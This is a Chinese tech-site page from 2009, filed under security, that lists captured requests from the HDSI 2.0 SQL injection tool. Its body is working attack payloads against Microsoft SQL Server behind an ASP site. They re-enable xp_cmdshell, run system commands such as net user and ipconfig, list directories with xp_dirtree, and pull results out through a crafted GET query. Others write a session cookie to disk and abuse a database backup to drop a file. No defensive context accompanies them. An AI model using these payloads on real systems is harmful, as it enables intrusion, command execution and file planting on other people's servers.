繁體中文当前位置: 首页 > 图文教程 > 服务器 > 安全防护 > hdsi2.0 sql注入部分抓包(1)
- 安全防护
- 如何清除隐藏的病毒文件
- 如何从进程中判断出病毒和木马
- 恶意邮件蠕虫假冒安全更新引诱用户上当
- 驱除毒源双击无法打开驱动器的杀毒方法
- SHOPEX最新漏洞利用及解决方案
- 关于arp欺骗原理及防范
- 如何处理杀不掉的病毒
- 杜绝ASP网站漏洞入侵的八大法则
- 认识木马及木马防范
- 短路引起的双通道内存错误
- 电脑故障速排方法-内存篇
- 在IIS中打开“写入”权限,将轻易被黑客入侵
- 让硬盘摆脱五大怪异的骚扰
- 如何解决文件夹不能删除的情况
- CPU占用100%原因及解决方法
- 熊猫烧香、威金的解决办法
- 病毒预警:使用MSN不慎可能被“幽灵”控制
- ASP网站漏洞解析及黑客入侵防范方法
- 处理恶意软件的六个步骤
- Vista首爆重大漏洞 网站被黑客植木马
安全防护 中的 hdsi2.0 sql注入部分抓包(1)
出处:互联网 整理: 软晨网(RuanChen.com) 发布: 2009-10-29 浏览: 34 ::
收藏到网摘: n/a
恢复cmd
;insert tb1 exec master..xp_cmdshell'net user '--
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
执行命令:
sql: ;ipconfig -all--
dos:
;Drop table comd_list ;CREATE TABLE comd_list (ComResult nvarchar(1000)) INSERT comd_list EXEC MASTER..xp_cmdshell
"ipconfig
-all"--
GET /plaza/event/new/crnt_event_view.asp?event_id=57
And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [comd_list] Where 1=1)>0
列目录:
c: jiaozhu 临时表
;drop table jiaozhu;CREATE TABLE jiaozhu(DirName VARCHAR(100), DirAtt VARCHAR(100),DirFile VARCHAR(100)) INSERT jiaozhu
EXEC
MASTER..XP_dirtree "c:",1,1--
GET /plaza/event/new/crnt_event_view.asp?event_id=57
And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [jiaozhu] Where 1=1)>0
上传文件:
本地路径:C:\Inetpub\wwwroot\cook.txt 保存位置:c:
数据库存储过程:
;exec master..xp_cmdshell ' echo
cdb_sid=3UrzOV;%20cdb_cookietime=2592000;%20cdb_auth=VgcCBAJbVQxVAVMCVghTBFJUUQYDBQdTV1BWVQoKAQE6PwNX;%
20cdb_visitedfid=12;%2
0cdb_oldtopics=D8D>c:\'--
数据库备份:(上传后删除临时表)
;Drop table [xiaopan];create table [dbo].[xiaopan] ([cmd] [text])--
;insert into xiaopan(cmd) values(' echoStr ')--
;declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s='c:/' backup database @a to disk=@s WITH
DIFFERENTIAL,FORMAT--
;Drop table [xiaopan]--
评论 (0) All
